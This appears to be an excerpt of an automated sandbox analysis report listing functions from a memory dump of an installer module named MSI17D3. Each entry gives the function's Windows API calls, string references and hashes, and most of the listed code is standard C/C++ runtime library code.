APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CBB531
std::_Lockit::_Lockit.LIBCPMT ref: 00CBB54F
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB577
LocalAlloc.KERNEL32(00000040,0000000C,00000000,665E9022,?,00000000,00000000), ref: 00CBB5CF
std::_Facet_Register.LIBCPMT ref: 00CBB6B7
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB6E1

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
String ID:
API String ID: 3931714976-0
Opcode ID: 8c37711cecfdbfb95e65e4f707afed476c2cb664e0a4a5238088330077459740
Instruction ID: 6a51e6e7798e3bf24c5dd2f5539bf0338d656a454fa0b890110d708734a3fe0b
Opcode Fuzzy Hash: 8c37711cecfdbfb95e65e4f707afed476c2cb664e0a4a5238088330077459740
Instruction Fuzzy Hash: B951ACB0900208DFDB15CF98C880BEEBBB4FF10314F244559E829AB391D7B59E05DB92

Function 00CBB700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CBB731
std::_Lockit::_Lockit.LIBCPMT ref: 00CBB74F
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB777
LocalAlloc.KERNEL32(00000040,00000008,00000000,665E9022,?,00000000,00000000), ref: 00CBB7CF
std::_Facet_Register.LIBCPMT ref: 00CBB863
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB88D

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
String ID:
API String ID: 3931714976-0
Opcode ID: 187b009bac93c4ec54c5cdf721f47638e80bd1a2fb2cfb9c64769f0cce7ff2a5
Instruction ID: d9d172fc45243f960189b2adb0a5494ca98bfc0839cc5eaf9de3fc35fb2e592d
Opcode Fuzzy Hash: 187b009bac93c4ec54c5cdf721f47638e80bd1a2fb2cfb9c64769f0cce7ff2a5
Instruction Fuzzy Hash: 6151B070900254DFCB21CF98D890BEEBBB4EF14310F24865DE855AB391DBB1AE45CBA1

Function 00CE0351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00CE043B
__freea.LIBCMT ref: 00CE04D1
__freea.LIBCMT ref: 00CE04ED

Strings

a/p, xrefs: 00CE05B5
am/pm, xrefs: 00CE0551

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: 58298a0628fe98178955538f42cd12ba502baa6ae6bf3f22345006422c64ad65
Instruction ID: 0ddc74c66efd4e8e4b5528b0fde2d9c6cf6b38e73eb40c5765fbe6c62d3ef278
Opcode Fuzzy Hash: 58298a0628fe98178955538f42cd12ba502baa6ae6bf3f22345006422c64ad65
Instruction Fuzzy Hash: EFC1F275900286DBCB248F6BC985ABA77B4FF45300F344049E915AB291D3B5AEC1CFE1

Function 00CD5978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00CD596F,00CD4900,00CD358F), ref: 00CD5986
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CD5994
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CD59AD
SetLastError.KERNEL32(00000000,00CD596F,00CD4900,00CD358F), ref: 00CD59FF

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2f03fc6318b64c882274f699be510a3e3a92e5995713abebfc037ed43c60db90
Instruction ID: 1189191fd31dac1de38751fcb29e3ad14c2287e76df16e95a03dddd8cdffecfc
Opcode Fuzzy Hash: 2f03fc6318b64c882274f699be510a3e3a92e5995713abebfc037ed43c60db90
Instruction Fuzzy Hash: 29018433219B12EFE62427756C96B6F6B94DB01779720132BF728C53E1EE624C02E190

Function 00CB3230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,URL,00000000,?,665E9022,?,00000004), ref: 00CB3294
MoveFileW.KERNEL32(?,00000000), ref: 00CB354A
DeleteFileW.KERNEL32(?), ref: 00CB3592

Part of subcall function 00CB1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00CB1AF7
Part of subcall function 00CB1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00CB1B7D

Part of subcall function 00CB2E60: LocalFree.KERNEL32(?,665E9022,?,?,00CF3C40,000000FF,?,00CB1242,665E9022,?,?,00CF3C75,000000FF), ref: 00CB2EB1

Strings

URL, xrefs: 00CB328E, 00CB357A
url, xrefs: 00CB33B9, 00CB3575

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: FileLocal$Free$AllocDeleteMoveNameTemp
String ID: URL$url
API String ID: 853893950-346267919
Opcode ID: 8fe06b9a6210dd7605aaa2aca6583c68fbcd979000f5e217b66a186670c735e7
Instruction ID: e32af8960ddacf30a5897cfa29f939a638d4fb8e2c247f7681e3a90ba1f796b2
Opcode Fuzzy Hash: 8fe06b9a6210dd7605aaa2aca6583c68fbcd979000f5e217b66a186670c735e7
Instruction Fuzzy Hash: C2C15870D142A89ADB25DF28CC98BDDBBB4BF54304F1442D9D409A7291EBB46F88CF91

Function 00CB36D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00CB3735
GetLastError.KERNEL32(?,?,?,00CF4215,000000FF), ref: 00CB381A

Part of subcall function 00CB2310: GetProcessHeap.KERNEL32 ref: 00CB2365

Part of subcall function 00CB46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00CB3778,-00000010,?,?,?,00CF4215,000000FF), ref: 00CB4736

_wcschr.LIBVCRUNTIME ref: 00CB37C6
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00CF4215,000000FF), ref: 00CB37DB

Strings

ntdll.dll, xrefs: 00CB37B3

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
String ID: ntdll.dll
API String ID: 3941625479-2227199552
Opcode ID: 3bc0c1517f43b5eb62e47192b2087ea286e4a6a10a1db8d9c7b5b2fc8630e399
Instruction ID: ffd59d407e29e3d67b5ce0f6ea5abc76ad90c33200570cc5fb366a897dfc9677
Opcode Fuzzy Hash: 3bc0c1517f43b5eb62e47192b2087ea286e4a6a10a1db8d9c7b5b2fc8630e399
Instruction Fuzzy Hash: 7F41B270A00645AFDB14DF68CC55BEEB7A8FF04310F14462AF926972C1EBB19B04CB51

Function 00CB621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB1A20: LocalFree.KERNEL32(?), ref: 00CB1A42

Part of subcall function 00CD3E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00CB1434,?,?,00CBD341,00CB1434,00D08B5C,?,00CB1434,?,00000000), ref: 00CD3EBA

GetCurrentProcess.KERNEL32(665E9022,665E9022,?,?,00000000,00CF4981,000000FF), ref: 00CB62EB

Part of subcall function 00CD2C98: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CA3
Part of subcall function 00CD2C98: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CE0

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00CB62B0
GetProcAddress.KERNEL32(00000000), ref: 00CB62B7

Part of subcall function 00CD2C4E: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C58
Part of subcall function 00CD2C4E: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C8B
Part of subcall function 00CD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00CD2D02

Strings

kernel32, xrefs: 00CB62AB
IsWow64Process, xrefs: 00CB62A6

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
String ID: IsWow64Process$kernel32
API String ID: 1333104975-3789238822
Opcode ID: 634f3fa2d36fb98d014c9d7a81c9b5483567b9b8f2758f852086f79f62fd67bd
Instruction ID: e221a82af1a764ac2bf1c6963c365b6c049557b1a59a7f778727c47308dcdda4
Opcode Fuzzy Hash: 634f3fa2d36fb98d014c9d7a81c9b5483567b9b8f2758f852086f79f62fd67bd
Instruction Fuzzy Hash: FD21D271904715DFDB10DFA4ED06BAEB7A8EB14B10F100A25F929E33D0EB756904DA62

Function 00CC8451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC8458
_Getvals.LIBCPMT ref: 00CC84AA
_Mpunct.LIBCPMT ref: 00CC84E5
_Mpunct.LIBCPMT ref: 00CC84FF

Strings

$+xv, xrefs: 00CC850A

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: e021336d3240bda2cb348d96faf48c55dcd027c6bb30757c13081b1c180206b4
Instruction ID: 99430c5287ba42a477c27b655c60ffd47b0942672255322dd858460b7658eeaf
Opcode Fuzzy Hash: e021336d3240bda2cb348d96faf48c55dcd027c6bb30757c13081b1c180206b4
Instruction Fuzzy Hash: 2B21D3B1800B926EDB25DF75C490B7BBEF8AB09301F04495EF459C7A42D734EA05DBA0

Function 00CB6250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(665E9022,665E9022,?,?,00000000,00CF4981,000000FF), ref: 00CB62EB

Part of subcall function 00CD2C98: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CA3
Part of subcall function 00CD2C98: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CE0

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00CB62B0
GetProcAddress.KERNEL32(00000000), ref: 00CB62B7

Part of subcall function 00CD2C4E: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C58
Part of subcall function 00CD2C4E: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C8B
Part of subcall function 00CD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00CD2D02

Strings

kernel32, xrefs: 00CB62AB
IsWow64Process, xrefs: 00CB62A6

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
String ID: IsWow64Process$kernel32
API String ID: 2056477612-3789238822
Opcode ID: 37bd3745a7332c1a97de11eee813786d4585e86bf97f21f48c4a9adbf3298f41
Instruction ID: 363739480432c3161c35a2b0f11684bb00a3c1c9480135799ea34a928ede79f4
Opcode Fuzzy Hash: 37bd3745a7332c1a97de11eee813786d4585e86bf97f21f48c4a9adbf3298f41
Instruction Fuzzy Hash: F1116072904754DFDB14CF54ED05BAAB7A8EB14710F100A6AE829D37D0EB766904CA61

Function 00CD69E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00CD6AA3,?,?,00D0DDCC,00000000,?,00CD6BCE,00000004,InitializeCriticalSectionEx,00CF97E8,InitializeCriticalSectionEx,00000000), ref: 00CD6A72

Strings

api-ms-, xrefs: 00CD6A32

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 15ecadb3b5cfc2b9f96a16b03bac09c760890f4e58495f84b42a4850aaece789
Instruction ID: bf61d037df776bc4b7c696a22314820050a8608145044baa464aad49d5e25d24
Opcode Fuzzy Hash: 15ecadb3b5cfc2b9f96a16b03bac09c760890f4e58495f84b42a4850aaece789
Instruction Fuzzy Hash: 5211A331A05725ABCF229B689C45B6D73A49F11770F258262FBA8FB380D770EE00D6D5

Function 00CE2DEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,665E9022,?,?,00000000,00CF6A6C,000000FF,?,00CE2DC1,?,?,00CE2D95,?), ref: 00CE2E23
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CE2E35
FreeLibrary.KERNEL32(00000000,?,00000000,00CF6A6C,000000FF,?,00CE2DC1,?,?,00CE2D95,?), ref: 00CE2E57

Strings

CorExitProcess, xrefs: 00CE2E2D
mscoree.dll, xrefs: 00CE2E1C

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 74b60c7c3d8f24a9f1bfd080299f512d67a9409496f51278df2c36a2e13ccb6c
Instruction ID: dba519bc89323f51ff6693d5ba9ad05bc9e73994e38656b35552a3d29659761c
Opcode Fuzzy Hash: 74b60c7c3d8f24a9f1bfd080299f512d67a9409496f51278df2c36a2e13ccb6c
Instruction Fuzzy Hash: C3018B71958669EFDB128F50DC05FBFB7BCFB04B11F044625F915A22A0D7759900CA51

Function 00CE6DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00CE6E40
__alloca_probe_16.LIBCMT ref: 00CE6F01
__freea.LIBCMT ref: 00CE6F68

Part of subcall function 00CE5BDC: HeapAlloc.KERNEL32(00000000,00000000,00CE3841,?,00CE543A,?,00000000,?,00CD6CE7,00000000,00CE3841,00000000,?,?,?,00CE363B), ref: 00CE5C0E

__freea.LIBCMT ref: 00CE6F7D
__freea.LIBCMT ref: 00CE6F8D

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: a168213b45a206f180f83eda3797473bb6718618eba1412a4af41a72aa65d606
Instruction ID: e9729051e9b7022618d155da26d3a5af2e923cef273aa4b10a06a733ee64ca8e
Opcode Fuzzy Hash: a168213b45a206f180f83eda3797473bb6718618eba1412a4af41a72aa65d606
Instruction Fuzzy Hash: C651E572A20286AFEF209FA6DC41EBF7AA9EF24790B150129FD14D7251E731DE10D760

Function 00CBB8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CBB8DD
std::_Lockit::_Lockit.LIBCPMT ref: 00CBB900
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB928
std::_Facet_Register.LIBCPMT ref: 00CBB98D
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB9B7

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 512ac29ef469a9ed8470315f39759b9a1663dc62ffc54da3a781b8e6798be1aa
Instruction ID: 314e39ec5af2c4d1ad6e2aa4198e86c4ab24ed74ea25a5c216f7e0a3488af814
Opcode Fuzzy Hash: 512ac29ef469a9ed8470315f39759b9a1663dc62ffc54da3a781b8e6798be1aa
Instruction Fuzzy Hash: CD310431D00218DFCB21DF54D950BAEBBB4EF20724F24459DE959A73A1D771AE01CBA2

Function 00CB5890 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,?,75EF4450,00CB5646,?,?,?,?,?), ref: 00CB5898

Strings

true, xrefs: 00CB58A7, 00CB58B6
Call to ShellExecuteEx() returned:, xrefs: 00CB58AF
Last error=, xrefs: 00CB58D9
false, xrefs: 00CB58A2

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorLast
String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
API String ID: 1452528299-1782174991
Opcode ID: 0c4fc960f4afaaac0c8e66a677170a1c70259792972f53fac299d86be4fb55e0
Instruction ID: 45b386b7dc46124baec8a118b095f6da50c839a1ffd6b2550dd1c6ca0b5d7bf2
Opcode Fuzzy Hash: 0c4fc960f4afaaac0c8e66a677170a1c70259792972f53fac299d86be4fb55e0
Instruction Fuzzy Hash: AB118E16A5062687CB302F6C98003BAA2E4DF50764F65047FDC89D73D1E6AA8D8187A4

Function 00CC1C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 00CC1C62
_Maklocstr.LIBCPMT ref: 00CC1C7F
_Maklocstr.LIBCPMT ref: 00CC1C9C
_Maklocchr.LIBCPMT ref: 00CC1CAE
_Maklocchr.LIBCPMT ref: 00CC1CC1

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: 5cfecc72b28a4f8800d092ad003c4dc561667bfe12fd0b3772c1a86438e7eb26
Instruction ID: 3a65eb863d187ffb36f05877ca19b2e3822e55d42d26337a19de8095a7d0c796
Opcode Fuzzy Hash: 5cfecc72b28a4f8800d092ad003c4dc561667bfe12fd0b3772c1a86438e7eb26
Instruction Fuzzy Hash: D911CEB1940784BFE720DBA6C881F12BBECAF06310F08051DFA59CBA42C264FD9087A5

Function 00CBD87C Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CBD883
std::_Lockit::_Lockit.LIBCPMT ref: 00CBD88D

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

numpunct.LIBCPMT ref: 00CBD8C7
std::_Facet_Register.LIBCPMT ref: 00CBD8DE
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD8FE

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID:
API String ID: 743221004-0
Opcode ID: ad9627526c3c0336e47e127386473643ce2b08e44b9e0cd074fadb9269ea4aa9
Instruction ID: 3304a363da71b710b3003cd66f27a1a354022943e0576b8c846b0e4b6db6443f
Opcode Fuzzy Hash: ad9627526c3c0336e47e127386473643ce2b08e44b9e0cd074fadb9269ea4aa9
Instruction Fuzzy Hash: DD11CB35900219EBCF09EBA4D841BFE7765AF94311F24085EE512AB3E1DF709E01DBA2

Function 00CC238F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2396
std::_Lockit::_Lockit.LIBCPMT ref: 00CC23A0

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

